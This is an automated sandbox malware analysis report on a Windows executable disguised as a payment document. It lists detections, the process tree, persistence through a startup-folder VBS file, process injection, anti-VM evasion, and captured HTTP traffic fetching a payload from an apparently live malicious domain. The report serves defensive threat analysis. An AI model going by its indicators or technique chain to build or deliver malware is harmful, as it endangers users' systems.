Edit tour

Windows Analysis Report
MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Overview

General Information

Sample name:	MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
Analysis ID:	1569870
MD5:	622b4fb4e2d8e9a803f526a77c867590
SHA1:	ecfac03a1de7cbef3b10f0e73c251b77edb63969
SHA256:	006c7725348c5fe7ef76cbce10e36c8cc5ba01c484d1107f63a29768d11dce86
Tags:	exePaymentuser-cocaman
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe" MD5: 622B4FB4E2D8E9A803F526A77C867590)

MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe (PID: 8140 cmdline: "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe" MD5: 622B4FB4E2D8E9A803F526A77C867590)

WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1644753165.00000000065B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 8140	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.65b0000.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, ProcessId: 7724, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\scriptcase-php8.exe

Avira: detection malicious, Label: HEUR/AGEN.1323343

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\scriptcase-php8.exe

ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\scriptcase-php8.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Joe Sandbox ML: detected

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdbeA source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbg source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1641742173.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb2 source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000003.00000002.2554083112.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic

HTTP traffic detected: GET /camp/Reibbfkkyy.dat HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /camp/Reibbfkkyy.dat HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: xianggrhen.com

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: scriptcase-php8.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, scriptcase-php8.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xianggrhen.com
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xianggrhen.com/camp/Reibbfkkyy.dat
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05654528 NtProtectVirtualMemory,	0_2_05654528
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05656680 NtResumeThread,	0_2_05656680
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05654520 NtProtectVirtualMemory,	0_2_05654520
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05656678 NtResumeThread,	0_2_05656678

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_027EE3C0	0_2_027EE3C0
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_027EA050	0_2_027EA050
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_027EA040	0_2_027EA040
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_027EA9E0	0_2_027EA9E0
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05650F30	0_2_05650F30
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05653468	0_2_05653468
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_05650F21	0_2_05650F21
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_06F2E740	0_2_06F2E740
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_06F2DBD0	0_2_06F2DBD0
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_06F10040	0_2_06F10040
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 0_2_06F10006	0_2_06F10006
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E52C1	3_2_026E52C1
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E52D0	3_2_026E52D0
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E1C40	3_2_026E1C40
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E1C2F	3_2_026E1C2F
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E448B	3_2_026E448B
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Code function: 3_2_026E4980	3_2_026E4980

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: invalid certificate

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe.39bf918.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs

Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:64:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\ecbc8bf7-1d32-4490-896f-db1e8f83d8d5

Jump to behavior

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

File read: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8140 -s 1168
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Process created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe	Section loaded: ntmarta.dll	Jump to behavior
